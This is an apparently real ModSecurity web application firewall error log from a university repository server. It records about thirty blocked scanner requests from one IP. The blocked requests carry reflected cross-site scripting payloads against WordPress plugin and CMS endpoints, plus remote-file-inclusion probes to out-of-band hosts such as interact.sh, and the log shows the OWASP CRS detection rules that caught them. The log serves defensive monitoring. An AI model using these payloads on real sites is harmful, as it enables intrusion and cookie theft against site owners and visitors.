[Tue Aug 29 11:53:41.987214 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAAo3If0AAAAa"]
[Tue Aug 29 11:53:42.755059 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAfWOZQAAAAL"]
[Tue Aug 29 11:53:42.908306 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAnHQtsAAAAT"]
[Tue Aug 29 11:53:43.720668 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAoAk2AAAAAC"]
[Tue Aug 29 11:53:43.747563 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAo3IgMAAAAa"]
[Tue Aug 29 11:53:45.543440 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAoesRAAAAAV"]
[Tue Aug 29 11:53:45.557290 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAoPudcAAAAM"]
[Tue Aug 29 11:53:45.672227 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoW7UMAAAAJ"]
[Tue Aug 29 11:53:47.059576 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAn409oAAAAW"]
[Tue Aug 29 11:53:48.064447 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAApIdj0AAAAU"]
[Tue Aug 29 11:53:50.936189 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAox7LEAAAAN"]
[Tue Aug 29 11:53:51.736542 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAApJDUoAAAAY"]
[Tue Aug 29 11:53:52.801692 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAAox7LYAAAAN"]
[Tue Aug 29 11:53:52.814261 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154MCo-f0AAAoUJeAAAAAB"]
[Tue Aug 29 11:53:53.077090 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154cCo-f0AAAo2m78AAAAA"]
[Tue Aug 29 11:53:53.638780 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAApPcuwAAAAa"]
[Tue Aug 29 11:53:54.560211 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoLfXgAAAAG"]
[Tue Aug 29 11:53:55.776138 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoPufgAAAAM"]
[Tue Aug 29 11:53:56.588666 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO155MCo-f0AAApOdcQAAAAL"]
[Tue Aug 29 11:53:56.639576 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAApJDVgAAAAY"]
[Tue Aug 29 11:53:57.571612 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/Login"] [unique_id "ZO155cCo-f0AAApOdccAAAAL"]
[Tue Aug 29 11:54:00.556696 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAApPcvQAAAAa"]
[Tue Aug 29 11:54:00.600136 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAApPcvUAAAAa"]
[Tue Aug 29 11:54:00.647079 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAApLWl0AAAAI"]
[Tue Aug 29 11:54:00.744463 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAoZ6WEAAAAK"]
[Tue Aug 29 11:54:01.634595 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAo2m9EAAAAA"]
[Tue Aug 29 11:54:02.656873 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAoZ6WgAAAAK"]
[Tue Aug 29 11:54:04.850742 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAowNwAAAAAH"]
[Tue Aug 29 11:54:04.896595 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAApQ2XYAAAAb"]
